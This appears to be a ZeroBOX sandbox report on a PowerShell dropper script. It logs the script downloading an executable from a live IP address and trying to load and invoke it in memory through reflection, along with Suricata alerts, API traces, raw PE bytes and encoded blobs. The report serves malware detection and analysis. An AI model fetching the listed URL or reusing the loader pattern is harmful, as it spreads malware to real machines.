Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 25, 2024, 4:54 p.m.	Sept. 25, 2024, 4:56 p.m.

Size	45.1KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`a3e3377666ed1b3cdbe3633fdde44fb3`
SHA256	`fa442d71588dae53a55fd069efec17462b3aeb2a664b37666265687d6cdcb0ec`
CRC32	`DD626EE3`
ssdeep	`768:Ya5JCw9Ws5Ut65655pFwttxU53ipHU53BS5NEOOyRvhp5l5eNEOOp:Yaiw9Ws5567ngSViCV62OpNhpXQ2OC`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\vkga15.ps1
2548

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
147.45.44.131	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 147.45.44.131:80 -> 192.168.56.101:49162	2400022	ET DROP Spamhaus DROP Listed Traffic Inbound group 23	Misc Attack
TCP 192.168.56.101:49162 -> 147.45.44.131:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.101:49162 -> 147.45.44.131:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 147.45.44.131:80 -> 192.168.56.101:49162	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.44.131:80 -> 192.168.56.101:49162	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 147.45.44.131:80 -> 192.168.56.101:49162	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 25, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (14 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly console_handle: 0x00000023	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: '37888 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: mpt was made to load a program with an incorrect format." console_handle: 0x00000047	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: At line:7 char:47 console_handle: 0x00000053	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes) console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x00000077	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000097	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: At line:13 char:19 console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + $entryPoint.Invoke <<<< ($null, $params) console_handle: 0x000000af	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: eption console_handle: 0x000000c7	1	1
WriteConsoleW Sept. 25, 2024, 4:54 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000000d3	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041c8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: f ø¼lZA¢pº'æÞàãfzHÿDÞEú1óø crypto_handle: 0x0041c8c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 8	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041ca40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041c940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041c940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041c940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 25, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041c940 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 25, 2024, 4:54 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://147.45.44.131/files/tgh6.exe

Performs some HTTP requests (1 event)

request

GET http://147.45.44.131/files/tgh6.exe

Allocates read-write-execute memory (usually to unpack itself) (31 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0273f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02739000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 458752 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065c0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065f1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x065f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 25, 2024, 4:54 p.m.	process_identifier: 2548 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Sept. 25, 2024, 4:54 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (9 events)

Data received	HTTP/1.1 200 OK Date: Wed, 25 Sep 2024 07:54:24 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 23 Sep 2024 13:31:10 GMT ETag: "9400-622c966e9419f" Accept-Ranges: bytes Content-Length: 37888 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELËwnðà"0z¨ À@ `(¨OÀðà¨ H.text `.rsrcðÀ@@.relocà@B\¨H¨%d07( }}}\|(+\|( ( 0/( } } \| (+\| ( ( 0Ðrp( ~( ( o s s o ( r¾op( o o! &o ( ràop( o o! &o" %%¢o# o$ ( r pp( o o% ( r$pp( o o& %¢%¢o' &( 0d(( o) iYpai+ +(a aÒ o* Y3 + X Xi2ÑiY(+( 0/(, } }\| (+\| (. ( 0( o/ (0 ( 0L( r>pp( o ( r¨pp( o ( rSqp( o 0È{ ,s1 },@{{o2 o3 (4 -<% }}\|(+Þn{\|þ% }(6 s7 Þ//{,{o8 Ü þ}\| (9 Þþ}\|(: n6\|(; 0´{ ,9~(o< (= -<% } }\| (+Þp{ \|þ% } (? ~(Þ/ ,o8 ÜÞþ} \| (@ Þþ} \| (A g t6\| (B 0 { ,4(oC (D -<% }}\| (+ÞP{\|þ% }(F &Þþ}\| (G Þþ}\| (H ]d6\| (I *BSJBv4.0.30319l#~T#StringsX q#USø~#GUID\#BlobW ú3- I râ?O?ã _Å¦6=÷ Õ XÊ"?&úº?S?F?A-? åzq §Ñçé??öi-ÛÉÑºÑ5O
Data received	V8KExIqew56BWwfG0oucRRaCGYOPksBex1PGXtEUmkIajteBFAbF0seNlN1XUNWWmkIajteBFAbF0seNlN1W0NTQSNnPloOTW4IE1gMah8OHmobDkcOPixHH2oPG0IschZBDlsCPksBex1PGXtaLEcfag9PAV8WFkEOWwIOUD42FU8JXwpHUUgTCFoYfxZvAXIVGWsVWh9CCHkbDktTNj1LGV8KE2AMcx9dRTchSnNBPj1LGV8KE2AMcx9dRTchTXNEJXckTT5aWl4fdwxPGXtaCVoMahNNTUkIE1oIUx9DAmwDPksBex1PGXtaLVwEah9jCHMVCFdNI1piAn8eO14EIi1cBGofN0sAcQhXKXsWH0kMah8QRVkfDm8ddzRPAHsJUgc2LicCTVkfDm8ddzRPAHsJUgc2JicHVhNwWg5NPgpcBGgbDktNbQ5PGXcZWnwIfx5jCHMVCFcpexZLCn8OHw4/extKIHsXFVwUPkcOIXEbHm8dd0Z8CH8eN0sAcQhXKXsWH0kMah8QRVkfDm8ddzRPAHsJUgc2LicCTVkfDm8ddzRPAHsJUgc2JycHVhNwWg5NPgpcBGgbDktNbQ5PGXcZWnsDcxteO3cfDWELTR9NGXcVFGoIch9JDGofWnsDcxteO3cfDWELTR9NGXcVFA5QPjZBDHo7CkdRSxRDDG4sE0saURx9CH0OE0EDWh9CCHkbDktTNj1LGV8KE2AMcx9dRTchS3NBPj1LGV8KE2AMcx9dRTchSx4wN0EjZz5aWg4dbBNYDGofWl0Zfw5HDj45CEsMah9+H3EZH10eWh9CCHkbDktNXQhLDGofKlwCfR9dHj5HWmICfx5vHXdGOVwIfw5LPWwVGUsebT5LAXsdG1oIIFJpCGo7CkcjfxdLHjZTIR4wMlppCGo7CkcjfxdLHjZTIR9cQ1MVYBRaWg5NPR9ACWwfHUcCcHckYBRaWg5NPQhLCncVFA4sbhNiAn8eH1xgFFoOTT4hPkIBVxdeAmwOUgwGewhACHJJSAxBPilLGVIbCVoobAhBHz5HWlofax8HMBNwWg5NPgpcBGgbDktNbQ5PGXcZWksVah9cAz4zFFo9aggOIXEbHmIEfAhPH2c7UnUgfwhdBX8WO11FSxRDDHAbHUsJSgNeCDAsOGwUTB9IPmoIU3NNbB9ITW0OCEcDeVpgDHMfUxVgFHckTT5aWnUpchZnAG4VCFpFPBFLH3AfFh1fPFYOLnYbCH0IaloTTV0SG1w+ew4ALHAJEwJNTR9aIX8JDmsfbBVcTSNaDlwYe1YOKGYbGVo+bh9CAXcUHQ5QPg5cGHtTJyNnPloOTW4IE1gMah8OHmobDkcOPh9WGXsIF
Data received	A4kcA5+GWxaPUsZTghBDl8eHlwIbQkGJHAOKlofPhJ+H3EZH10eMlp1IH8ICUYMcjtdRUsUF08Dfx1LCUoDCktDSDhsFEwfHH0ZbFNzTWwfHA4eaghHA3laNE8Ae1MVYBR3cA5NPlpeH3cMG1oIPglaDGoTGQ45PjZBDHo7CkdRSkQGHmoIE0AKPhZHD2wbCFcjfxdLQT4JDlwEcB0OAHsOEkEJUBtDCDd3cA5NPlpVYBRaWg5NPloOTWwfDlsfcFoGOTdSFUwHexlaRFMbCF0FfxYAKnsOPksBex1PGXs8FVwraxRNGXcVFH4CdxRaCGxSPUsZTghBDl8eHlwIbQkGIXEbHmIEfAhPH2c7UlwIeFpCBHwIG1wUUBtDCDdWWlwIeFpDCGoSFUojfxdLRDJaDlcdexVIRUpTUxVgFFoOTT4HdyRNPloOTnsUHlwIeRNBAxNwdyRNPloOTmwfHUcCcFp9GWwPGVoeE3AOTT5aIX0ZbA9NGVIbA0EYalJiDGcVD1omdxRKQ00fC1sIcA5HDHJWWn4MfREOUD5LU3NgFFoOTT4KCEcbfw5LTW0OCFsOalp+H3EZH10eVxRIAhNwWg5NPgEjZz5aWg5NPloOHWsYFkcOPjNAGU4OCA49bBVNCG0JMk8DehZLVhNwWg5NPloOTT4KD0wBdxkOJHAOKlofPi5GH3sbHmYMcB5CCCV3cA5NPloOTT5aClsPchNNTWsTFFpNTghBDnsJCWcJJXckTT5aWg5NPlpeGHwWE01NaxNAGT4uElwIfx5nCSV3cA5NPlpTYBR3cA5NPlp1PmoID00ZUhtXAmsOUmIMZxVbGVUTFEpDTR9fGHsUDkcMclYOPX8ZEQ5QPksHMBNwWg5NPgpcBGgbDktNbQ5cGH0OWn0ZfwhaGG4zFEgCE3AOTT5aASNnPloOTT5aWg4daxhCBH1aD0cDalp9BGQfQSNnPloOTT5aWg4daxhCBH1aCVofdxRJTUwfCUsfaB9KVhNwWg5NPloOTT4KD0wBdxkOHmoIE0AKPj5LHnUOFV5WE3AOTT5aWg5NPgpbD3ITGQ4eaghHA3laLkcZch8VYBRaWg5NPloOTUU3G1wedhtCLG1SL0AAfxRPCnseLlcde1RsFEgbFm8fbBtXQT4pE1QIXRVAHmpaRw5eKFNzTW4IE1gMah8OD2cOH3UwPjdHHn1BdyRNPloOTT5aWl4YfBZHDj4zFFo9aggOP3sJH1wbex4cVhNwWg5NPloOTT4KD0wBdxkOJHAOKlofPilaCVcUClsZJXckTT5aWg5NPlpeGHwWE01NVxRaPWoIWn0ZejVbGW4PDhVgFFoOTT5aWg5Nbg9MAXcZWmcDa
Data received	ipaHz4pDkoobAhBHyV3cA5NPlpTYBRaWg5NPR9ACWwfHUcCcHckYBRaWg5NPQhLCncVFA49bBVNCG0JP1YIfQ9aBHEUdyRNPloOHWsYFkcOPglaDGoTGQ4bcRNKTVIVG0o9bBVNRW0OCEcDeVpIBHIfNE8Ae1YOIHsXFVwUTQ5cCH8XWkMIcxVcFE0OCEsMc1MjZz5aWg4WE3AOTT5aWg5NPhhXGXshJw4LdxZLL2cOH11NI1pDCHMVCFc+aghLDHNULkEsbAhPFDZTQSNnPloOTT5aWg4EcA4OCGYfGVsZdxVAPmofCg5QPkseXiV3cCNnPloOTT5aWg4LcQgORXcUDg4EPkcOXSVaEw5RPh9WCH0PDkcCcClaCG5BWkdGNVMjZz5aWg5NPloOFhNwWg5NPloOTT5aWg5NbQ1HGX0SWgYIZh9NGGoTFUA+ah9eRBNwWg5NPloOTT5aWg5NZXckTT5aWg5NPloOTT5aWg5NPhlPHntaSxRgFFoOTT5aWg5NPloOTT5aWg4OfwlLTSxAdyRNPloOTT5aWg5NPloOTT5aWg5NPh9WCH0PDkcCcClaCG5aRw5fK0EjZz5aWg5NPloOTT5aWg5NPloOTT5aGFwIfxEVYBRaWg5NPloOTT5aWg5NPloODn8JHw5eJHckTT5aWg5NPloOTT5aWg5NPloOTT4YFUEBPhxCDHlaRw4ZbA9LVhNwWg5NPloOTT5aWg5NPloOTT5aWg4EeFoGC3IbHQdgFFoOTT5aWg5NPloOTT5aWg5NPloOFhNwWg5NPloOTT5aWg5NPloOTT5aWg5NPloOCGYfGVsZdxVAPmofCg5QPksOMz5NTxVgFFoOTT5aWg5NPloOTT5aWg5NPloOEBNwWg5NPloOTT5aWg5NPloOTT5aWg4PbB9PBiV3cA5NPloOTT5aWg5NPloOTT4ZG10IPkMUYBRaWg5NPloOTT5aWg5NPloOTT5aWksVexlbGXcVFH0ZewoOUD5PQSNnPloOTT5aWg5NPloOTT5aWg5NPlpMH3sbERVgFFoOTT5aWg5NPloOTT5aWg4OfwlLTS9KQCNnPloOTT5aWg5NPloOTT5aWg5NPlpLFXsZD1oEcRR9GXsKWhNNLEEjZz5aWg5NPloOTT5aWg5NPloOTT5aGFwIfxEVYBRaWg5NPloOTT5aWg4QE3AOTT5aWg5NPgcjZxNwWg5NPloOTT4cFVxNNhNAGT4TWhNNLkEOBD5GWhtWPhMFRjd3cA5NPloOTT5aASNnPloOTT5aWg5NPloOBHAOWkwUah9dP3sbHg5QPkoVYBRaWg5NPloOTT5aWg4+ahtcGWsKM0ALcVpdGX8IDlsdVxRIA
Data received	j5HWkAIaVp9GX8IDlsdVxRIAjZTQSNnPloOTT5aWg5NPloOPWwVGUsebTNAC3FaClwCfR9dHlcUHEFNI1pACGlaKlwCfR9dHlcUHEFFN0EjZz5aWg5NPloOTT5aWl0ZfwhaGG4zFEgCMClHF3taRw5FaxNAGTc3G1wedhtCQ00TAEsieFJaFG4fFUhFTQ5PH2oPCmcDeBUHRCV3cCNnPloOTT5aWg5NPloOGWwDdyRNPloOTT5aWg5NPlpVYBRaWg5NPloOTT5aWg5NPloOD3EVFg4dbBVNCG0JOVwIfw5LCT5HWm0fextaCE4IFU0IbQkGC3cWH2AMcx8CTTxYVg4kcA5+GWxUIEsfcVYOJHAOKlofMCBLH3FWWkgMcglLQT5OWlJNL0kaXy9NTRxVMlpnA2oqDlxDRB9cAjJaFFsBclYOH3scWl0ZfwhaGG4zFEgCMlpcCHhaClwCfR9dHlcUHEFEJXckTT5aWg5NPloOTT5aWg5NPhNITTZbClwCfR9dHl0IH08Zex4HYBRaWg5NPloOTT5aWg5NPloOFhNwWg5NPloOTT5aWg5NPloOTT5aWg4ZdghBGj4UH1lNWwJNCG4OE0EDNlMVYBRaWg5NPloOTT5aWg5NPloOEBNwdyRNPloOTT5aWg5NPloOTT5aE0AZPhxHAXs7HkofewldTSNaOUEDaB9cGUoVM0AZLUgGC3cWH2wUah9dQT5MSgdWE3AOTT5aWg5NPloOTT5aWg5NdxRaTXcXG0kIXBtdCD5HWm0CcAxLH2ouFWcDakkcRXgTFksvZw5LHjJaHEcBeztKCWwfCV1NNVobXzdBdyRgFFoOTT5aWg5NPloOTT5aWg4EcA51MD4ZFUAZewJaTSNaFEsaPhNAGUVLTRcwJXckTT5aWg5NPloOTT5aWg5NPhlBA2ofAlo2LicOUD5MTxteJkEjZxNwWg5NPloOTT5aWg5NPloOTXccWgYkcA5+GWxUKUcXe1oTUD5OUyNnPloOTT5aWg5NPloOTT5aWlVgFFoOTT5aWg5NPloOTT5aWg5NPloOBHhaUg8qew56BWwfG0oucRRaCGYOUl4fcRlLHm0zFEgCMC5GH3sbHmYMcB5CCDJaGUEDah9WGTdTdyRNPloOTT5aWg5NPloOTT5aWg5NPgEjZz5aWg5NPloOTT5aWg5NPloOTT5aWg5NPg5GH3ENWkAIaVprFX0fCloEcRQGRCV3cA5NPloOTT5aWg5NPloOTT5aWg5NY3ckTT5aWg5NPloOTT5aWg5NPgcjZz5aWg5NPloOTT5aWg5NPlpLAW0fdyRNPloOTT5aWg5NPloOTT5aASNnPloOTT5aWg5NPloOTT5aW
Data received	g5NPlpHCz5SW2kIai1BGihOLkYfextKLnEUDksValJeH3EZH10eVxRIAjAuElwIfx5mDHAeFktBPhlBA2ofAlpEN3ckTT5aWg5NPloOTT5aWg5NPloOTT4BdyRNPloOTT5aWg5NPloOTT5aWg5NPloOTT4OElwCaVpACGlaP1YOewpaBHEUUgdWE3AOTT5aWg5NPloOTT5aWg5NPloOTWN3cA5NPloOTT5aWg5NPloOTT4HdyRgFFoOTT5aWg5NPloOTT5aWg4EcA4OCHwCWhNNfRVAGXsCDnVZLycVYBRaWg5NPloOTT5aWg5NPloOBHAOWkwMbR9vCXoIH10ePkcOXSV3cCNnPloOTT5aWg5NPloOTT5aWkcLPlIPP3sbHmMIcxVcFDYKCEEOewldJHAcFQA9bBVNCG0JMk8DehZLQT4fGFZNNVoWQT4IH0hNfBtdCF8eHlwIbQkCTSpWWlwIeFpMFGofCXwIfx4HRBNwWg5NPloOTT5aWg5NPloOTWV3cA5NPloOTT5aWg5NPloOTT5aWg5NahJcAmlaFEsaPj9WDnsKDkcCcFIHVhNwWg5NPloOTT5aWg5NPloOTWN3cCNnPloOTT5aWg5NPloOTT5aWkcLPlJHAH8dH2wMbR8OUCNaGE8eeztKCWwfCV1EE3AOTT5aWg5NPloOTT5aWg5NZXckTT5aWg5NPloOTT5aWg5NPloOTT4TH